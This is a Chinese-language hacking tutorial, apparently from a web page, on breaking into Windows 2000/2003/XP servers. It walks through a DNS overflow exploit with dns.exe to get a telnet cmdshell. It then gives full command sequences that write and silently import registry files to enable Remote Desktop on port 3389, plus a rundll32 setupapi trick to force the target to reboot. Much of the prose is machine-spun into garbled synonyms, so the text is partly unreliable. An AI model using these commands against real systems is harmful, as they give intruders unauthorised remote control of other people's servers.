下载远程控制木马

时间:2022-06-13 06:44:33

1、Win7、Win2003、XP系统
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

2、2000系统

简要说一下如何进行DNS溢出打击。我用的溢出操作措施是dns.exe,在CMD下运行它可以看到它的使用参数等信息。执行"dns -s IP"命令检测方针IP是否存在DNS溢露马脚,若存在则进行溢出打击,执行"dns -t 2000all IP 1207"后提示要我们检测返回的1100端口的shell。"telnet IP 1100"告成得到返回的cmdshell。注意目录为c:/WINNT/system32,接着我们需要做的是使用"echo"命令写入一个3389.reg注册表文件。将如下代码一行一行地复制到cmdshell窗口后按回 车执行:

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows/Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS/.DEFAULT/Keyboard Layout/Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg

简单说明一下,">"标记是笼罩写入文件,,如无此文件则创建,有则笼罩本来的内容写入。">>"是追加写入,即在原有文件内容的根本上在 后面写入内容。这里是写入内容到3389.reg文件中!需要注意的是第二行,阿谁感化是写入一行空格,因为.reg文件的格局 必需如此!告成写入完毕后接着执行导入操纵,执行"regedit /s 3389.reg"。这样注册表文件就已经顺利导入到注册内外去了。不过需要注意的是在cmdshell下不要输错任何一个字符,否则将无法执行,建议先 本身打好在记事本上,确保无误之后再复制到cmdshell窗口执行。然后可以用下面这个要领重启方针主机。在cmdshell下执行如下代码:

@ECHO OFF & cd/d %temp% & echo [version] > {out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> {out}.inf
echo [defaultinstall] >> {out}.inf
rundll32 setupapi,%inf% 1 %temp%/{out}.inf r

按挨次将以上五行代码一行一行地复制到cmdshell上,复制完一行按一次回车执行,五行都执行完毕后,处事器就会重启的了。固然让处事器重启的要领对照多,好比结束失系统关键进程、代码模拟按键等都是可以的,如无不测,期待服 务器完成重启之后再连接方针发明长途桌面处事已经告成开启了。至此Windows 2000操纵系统溢出后返回的cmdshell下开启长途桌面处事就告成完成了。

3、2003系统

相对付2000的系 统来说,2003cmdshell下开启长途桌面处事就对照容易一些了,起码无需重启嘛!第一种要领也是用"echo"命令写入一个 3389.reg文件,再"regedit /s 3389.reg"导入注册表文件即可开启,对照简单,与上面介绍的2000的开启要领类似。将如下代码一行一行地复制到cmdshell窗口后按回车执 行:

echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg

完成以上操纵后再执行"regedit /s 3389.reg"导入即可生效!不过这个要领相对来说对照麻烦。我们还可以用此外一种对照简单的要领来开启长途桌面处事的。在介绍另一个操纵要领之前,我们先来熟悉下2003系统下长途桌面处事的一个最关键的注册表键值。
在"HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

下数值名称为"fDenyTSConnections"的这一项,可以看到它的数值数据为1或0。数值为1的时候*长途桌面处事,数值为0的时候开启长途 桌面处事。换句话说,我们只要可以在cmdshell下变动这个关键的注册表键值数据就可以到达实现开启长途桌面处事的目的了!有幸的是,在2003下有 一个"reg"命令完全可以做到这一点。这里我们找一台操纵系统为2003的处事器,通过和上面介绍的同样要领溢出后返回一个cmdshell。当我们测验考试连接的时候会发明根柢无法连接上去。下面详细说明一下用"reg"命令开启长途桌面处事。执行:

reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"